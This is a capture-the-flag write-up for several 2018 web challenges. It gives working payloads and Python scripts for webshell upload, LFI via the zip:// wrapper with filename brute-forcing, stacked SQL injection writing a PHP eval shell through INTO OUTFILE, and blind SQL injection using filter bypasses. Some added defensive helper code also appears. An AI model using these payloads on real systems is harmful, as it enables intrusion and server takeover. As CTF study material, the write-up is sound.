手速要快 (Be Quick)

A password was found in a response header.
2018 安恒杯 November Round - Web Writeup
Then, on the upload page, upload a one-line webshell; intercept the request with Burp and append .jpg to the extension.
Visiting the uploaded file shows it is still parsed as PHP.
Got a shell and read the flag.
flag{698539765730b69026796420b9201e03}

image_up

Opening the site, the URL carries a page= parameter, which suggests file inclusion.
Test the php:// wrapper:
http://101.71.29.5:10007/index.php?page=php://filter/convert.base64-encode/resource=index
This returns the source:

<?php
  if(isset($_GET['page'])){
    // only ".." is rejected; stream wrappers such as php://, zip:// and phar:// pass this check
    if(!stristr($_GET['page'],"..")){
      $page = $_GET['page'].".php";   // ".php" is always appended to the supplied value
      include($page);
    }else{
      header("Location: index.php?page=login");
    }
  }else{
    header("Location: index.php?page=login");
  }

So .php is appended to whatever page= contains.
Trying the login on a whim worked and led to the upload page; the upload source was read the same way:

<?php
    $error = "";
    $exts = array("jpg","png","gif","jpeg");
    if(!empty($_FILES["image"]))
    {
        // extension is the last "." segment of the client-supplied file name
        $temp = explode(".", $_FILES["image"]["name"]);
        $extension = end($temp);
        // $_upfileS is not $_FILES (kept as in the source shown); with @ the undefined value is null, so this check never fails
        if((@$_upfileS["image"]["size"] < 102400))
        {
            if(in_array($extension,$exts)){
              // stored name depends only on the original basename and the server's current time
              $path = "uploads/".md5($temp[0].time()).".".$extension;
              move_uploaded_file($_FILES["image"]["tmp_name"], $path);
              $error = "上传成功!";
            }else{
              $error = "上传失败！";
            }
        }else{
          $error = "文件过大，上传失败！";
        }
    }
?>

A file upload next to an LFI suggests LFI + upload: upload a jpg whose content is a one-line webshell, then include it to get a shell. Because of $path = "uploads/".md5($temp[0].time()).".".$extension; the stored filename can be predicted.
Since index.php forcibly appends .php, the zip:// wrapper comes to mind:
write a one-line PHP shell, compress it into a zip, rename the extension to jpg, and upload the jpg.
Script to brute-force the filename:

import time
import requests
import hashlib

url = "http://101.71.29.5:10007/"

def md5(s):
    # hex md5 of a string, matching PHP's md5()
    m = hashlib.md5()
    m.update(s.encode())
    return m.hexdigest()

# the zip archive (containing coold.php) is uploaded under a .jpg name
files = {
    "image": ("coold.jpg", open("1.zip", "rb"))
}
# the server clock is 8 hours ahead of local time (see the PS below)
t = int(time.time()) + 8 * 3600
requests.post(url=url + "index.php?page=upload", files=files)
# the server names the file md5($temp[0].time()).jpg, so probe a +-200 s window around t
for i in range(t - 200, t + 200):
    path = "uploads/" + md5("coold" + str(i)) + ".jpg"
    status = requests.get(url=url + path).status_code
    if status == 200:
        print(path)
        break

PS: the server's 8-hour clock offset here was a real pitfall.

With the filename brute-forced, visit:

http://101.71.29.5:10007/index.php?page=zip://./uploads/4d1fdcca6693db54aae0b2d92cf8eda5.jpg%23coold

Because this is a zip archive, %23 (#) terminates the archive path and what follows is the entry name inside the archive; since .php is force-appended, writing just coold is enough.
With the phar:// wrapper, %23 would be replaced by /.
With the shell, execute commands and read the flag.

flag{3809f2ce999b4d99c8051e285505a014}
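As an added defensive illustration (not code from the original writeup), the following Python models the two weaknesses this challenge chains, the enumerable upload name md5($temp[0].time()) and a page= parameter that accepts stream wrappers, and places a hardened helper beside each; ALLOWED_PAGES and the function names are my own assumptions.

```python
import hashlib
import re
import secrets

# assumed whitelist of the pages index.php is allowed to include
ALLOWED_PAGES = {"login", "upload"}


def php_upload_name(basename, unix_time, ext="jpg"):
    """Reproduce uploads/md5($temp[0].time()).ext exactly as the challenge's upload code does."""
    digest = hashlib.md5((basename + str(unix_time)).encode()).hexdigest()
    return "uploads/" + digest + "." + ext


def candidate_names(basename, guessed_time, window=200):
    """Every name the server could have produced if its clock is within +-window seconds
    of the guess: the whole space to probe is only 2*window+1 names."""
    return {php_upload_name(basename, t)
            for t in range(guessed_time - window, guessed_time + window + 1)}


def hardened_upload_name(ext):
    """Unguessable replacement: nothing about the client name or the clock leaks into it."""
    return "uploads/" + secrets.token_hex(16) + "." + ext


def safe_include_target(page):
    """The original only rejects '..', so php://filter, zip:// and phar:// all get through.
    Accept a bare whitelisted name only; None means the caller should redirect to login."""
    if not re.fullmatch(r"[a-z]+", page) or page not in ALLOWED_PAGES:
        return None
    return page + ".php"
```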

write a shell

An injection point was found on the user info page, protected by magic quotes and replacement of disallowed strings.
@ is filtered, but a WAF bug converts ^ into @.

First check the user's privileges. SQL statement:

select GRANTEE,PRIVILEGE_TYPE,3,4,IS_GRANTABLE from information_schema.USER_PRIVILEGES

Payload:

http://101.71.29.5:10011/user/user.php?id=24;set^s=concat(CHAR(115, 101, 108, 101, 99, 116, 32, 71, 82, 65, 78, 84, 69, 69, 44, 80, 82, 73, 86, 73, 76, 69, 71, 69, 95, 84, 89, 80, 69, 44, 51, 44, 52, 44, 73, 83, 95, 71, 82, 65, 78, 84, 65, 66, 76, 69, 32, 102, 114, 111, 109, 32, 105, 110, 102, 111, 114, 109, 97, 116, 105, 111, 110, 95, 115, 99, 104, 101, 109, 97, 46, 85, 83, 69, 82, 95, 80, 82, 73, 86, 73, 76, 69, 71, 69, 83));PREPARE a FROM^s;EXECUTE a;

The user has FILE read/write privileges.

Check the permitted file read/write path. SQL statement:

show variables like '%secure_file_priv%'

Payload:

http://101.71.29.5:10011/user/user.php?id=24;set^s=concat(CHAR(115, 104, 111, 119, 32, 118, 97, 114, 105, 97, 98, 108, 101, 115, 32, 108, 105, 107, 101, 32, 39, 37, 115, 101, 99, 117, 114, 101, 95, 102, 105, 108, 101, 95, 112, 114, 105, 118, 37, 39, 10));PREPARE a FROM^s;EXECUTE a;


Write the one-line shell. SQL statement:

select'<?php eval($_POST[coold]);?>'into outfile '/var/www/html/favicon/coold.php'

Payload:

http://101.71.29.5:10011/user/user.php?id=24;set^s=concat(CHAR(115, 101, 108, 101, 99, 116, 39, 60, 63, 112, 104, 112, 32, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 111, 111, 108, 100, 93, 41, 59, 63, 62, 39, 105, 110, 116, 111, 32, 111, 117, 116, 102, 105, 108, 101, 32, 39, 47, 118, 97, 114, 47, 119, 119, 119, 47, 104, 116, 109, 108, 47, 102, 97, 118, 105, 99, 111, 110, 47, 99, 111, 111, 108, 100, 46, 112, 104, 112, 39));PREPARE a FROM^s;EXECUTE a;

Visit http://101.71.29.5:10011/favicon/coold.php

Shell obtained.

flag{f6c5acfd4192b4152661d19b411d2d63}
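For the defender's side of this challenge, here is an added triage helper (my own code, not from the writeup) that takes a raw ?id= value as a WAF or log reviewer would see it, normalises the ^ to @ rewrite the writeup relies on, and flags stacked statements and PREPARE ... FROM @var while decoding the CHAR() lists back into the SQL they hide; SAMPLE_ID is constructed from the secure_file_priv payload above.

```python
import re
from urllib.parse import unquote_plus

# constructed sample: the id parameter shape from this challenge (CHAR list copied from the writeup payload)
SAMPLE_ID = ("24;set^s=concat(CHAR(115, 104, 111, 119, 32, 118, 97, 114, 105, 97, 98, 108, 101, 115, "
             "32, 108, 105, 107, 101, 32, 39, 37, 115, 101, 99, 117, 114, 101, 95, 102, 105, 108, 101, "
             "95, 112, 114, 105, 118, 37, 39, 10));PREPARE a FROM^s;EXECUTE a;")

CHAR_CALL = re.compile(r"CHAR\(\s*([\d\s,]+?)\s*\)", re.IGNORECASE)


def _chars_to_text(arg_list):
    # "115, 104" -> "sh"; int() tolerates the surrounding spaces
    return "".join(chr(int(n)) for n in arg_list.split(","))


def decode_char_calls(sql):
    """Rewrite each MySQL CHAR(n, n, ...) as the quoted literal it builds, so a statement
    assembled to dodge keyword filters reads plainly in a log review."""
    return CHAR_CALL.sub(lambda m: "'" + _chars_to_text(m.group(1)) + "'", sql)


def inspect_id_param(raw):
    """Triage one ?id= value: stacked statements, PREPARE ... FROM @var, decoded CHAR() literals.
    The writeup says the WAF turns ^ into @, so the value is normalised the same way first."""
    value = unquote_plus(raw).replace("^", "@")
    statements = [s for s in (p.strip() for p in value.split(";")) if s]
    return {
        "numeric_only": value.isdigit(),
        "stacked": len(statements) > 1,
        "prepare_from_var": re.search(r"\bPREPARE\s+\w+\s+FROM\s*@\w+", value, re.I) is not None,
        "char_literals": [_chars_to_text(m.group(1)) for m in CHAR_CALL.finditer(value)],
        "decoded": decode_char_calls(value),
    }
```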

ezsql

Read files with load_file.

What a brutal blacklist.

Referenced 一叶飘零's writeup:
https://www.anquanke.com/post/id/166492#h2-4

Opening the challenge, F12 reveals

http://101.71.29.5:10041/show.php?id=1

So try injection; with the experience from the earlier challenges, go straight to

http://101.71.29.5:10008/show.php?id=if(1,1,2)

(screenshot: response for id=if(1,1,2))

http://101.71.29.5:10008/show.php?id=if(0,1,2)

(screenshot: response for id=if(0,1,2))
(screenshot: response when a filter is triggered)
(screenshot: response on a database error)
That gives four distinguishable response states for the challenge.
Try

if((database())like(0x25),1,2)

like turns out to be filtered, so try regexp

if((database())regexp(0x5e),1,2)

After some fuzzing the database name comes out as
web
So write a script for the injection.
Try to dump the tables:

select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()

Here a problem: = is filtered and so is like, which leads to

in(database())

But there is another pitfall; it has to be bypassed like this

in%0a(database())

information_schema.TABLES is filtered as well, and is bypassed as follows

information_schema%0a.%0aTABLES

After the bypasses, two tables come back

admin,flaggg

Dump the columns the same way

id,f1agg

Finally, extracting the flag ran into a problem: for some reason, whenever regexp matched a digit the database threw an error,
so only flag{ could be recovered.
That suggested using between.
From earlier experience, the flags are all md5,
so iterate over 0~f.

# -*- coding:utf-8 -*-
import requests
import string

flag = 'flag{'
payload = flag.encode().hex()             # known prefix as hex, e.g. 666c61677b
charset = string.digits + 'abcdef' + '}'  # flag body is md5 hex, then the closing brace
for i in range(1, 200):
    for j in range(len(charset)):
        # lower bound: prefix + '/' (0x2f, just below '0'); upper bound: prefix + charset[j]
        tmp1 = payload + '2f'
        tmp2 = payload + charset[j].encode().hex()
        url = ('http://101.71.29.5:10008/show.php?id=if(((select%0af1agg%0afrom%0aflaggg)'
               'between%0a0x' + tmp1 + '%0aand%0a0x' + tmp2 + '),1,2)')
        r = requests.get(url)
        if '郑州烩面的价钱为10' in r.text:
            # the stored value is longer than the upper bound, so the first charset[j] that
            # makes BETWEEN true is one past the real character: take charset[j-1]
            payload += charset[j - 1].encode().hex()
            print(bytes.fromhex(payload).decode())
            break

flag{5d6352163c30ba51f1e2c0dd08622428}
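The %0a trick above works because the challenge's blacklist matches literal substrings of the decoded parameter. As an added example (my own code, not from the writeup or the challenge; BLOCKED is an assumed reconstruction of the filtered strings), this shows the naive check missing the newline-split tokens, a whitespace-normalising check that catches them, and the integer whitelist that makes the blacklist unnecessary.

```python
import re
from urllib.parse import unquote

# assumed literal blacklist, reconstructed from what the writeup found filtered (not the challenge's real list)
BLOCKED = ["=", "like", "in(", "information_schema.tables"]


def _blacklisted(decoded):
    low = decoded.lower()
    return any(bad in low for bad in BLOCKED)


def naive_blocked(raw_param):
    """Literal substring match on the URL-decoded value: what the challenge appears to do,
    and why in%0a( and information_schema%0a.%0aTABLES slip through."""
    return _blacklisted(unquote(raw_param))


def normalize_sql(decoded):
    """Collapse every whitespace run (the %0a newline included) and strip whitespace around
    punctuation, so the %0a-split tokens compare equal to their unbroken forms."""
    one_space = re.sub(r"\s+", " ", decoded)
    return re.sub(r"\s*([().,])\s*", r"\1", one_space)


def normalized_blocked(raw_param):
    return _blacklisted(normalize_sql(unquote(raw_param)))


def accept_id(raw_param):
    """The real fix: show.php?id= only ever needs an integer, so accept nothing else."""
    return re.fullmatch(r"\d{1,10}", unquote(raw_param)) is not None
```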

interesting web

orz…
